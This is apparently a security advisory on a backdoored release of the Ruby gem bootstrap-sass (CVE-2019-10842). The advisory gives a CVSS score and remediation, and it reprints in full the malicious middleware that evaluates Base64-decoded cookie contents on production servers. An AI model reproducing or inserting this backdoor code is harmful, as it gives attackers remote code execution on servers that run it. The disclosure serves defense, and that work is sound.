Malicious Package

Affecting bootstrap-sass gem, versions >=3.2.0.3, <3.2.0.4

Do your applications use this vulnerable package? Test your applications

Overview

bootstrap-sass is a Sass-powered version of Bootstrap 3, ready to drop right into your Sass powered applications.

Affected versions of this package are malicious. The file lib/active-controller/middleware.rb contains a backdoor which will enable a remote attacker to run arbitrary code on the server by decoding a specific cookie value and evaluating its content.

Details

When bootstrap-sass gets imported, it also imports the following malicious middleware code that resides on lib/active-controller/middleware.rb:

begin
 require 'rack/sendfile'
 if Rails.env.production?
   Rack::Sendfile.tap do |r|
     r.send :alias_method, :c, :call
     r.send(:define_method, :call) do |e|
       begin
         x = Base64.urlsafe_decode64(e['http_cookie'.upcase].scan(/___cfduid=(.+);/).flatten[0].to_s)
         eval(x) if x
       rescue Exception
       end
       c(e)
     end
   end
 end
rescue Exception
 nil
end

Remediation

Avoid using the malicious versions of bootstrap-sass.

References

CVSS Score

9.8
high severity
  • Attack Vector
    Network
  • Attack Complexity
    Low
  • Privileges Required
    None
  • User Interaction
    None
  • Scope
    Unchanged
  • Confidentiality
    High
  • Integrity
    High
  • Availability
    High
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Credit
Derek Barnes
CVE
CVE-2019-10842
CWE
CWE-506
Snyk ID
SNYK-RUBY-BOOTSTRAPSASS-174093
Disclosed
26 Mar, 2019
Published
03 Apr, 2019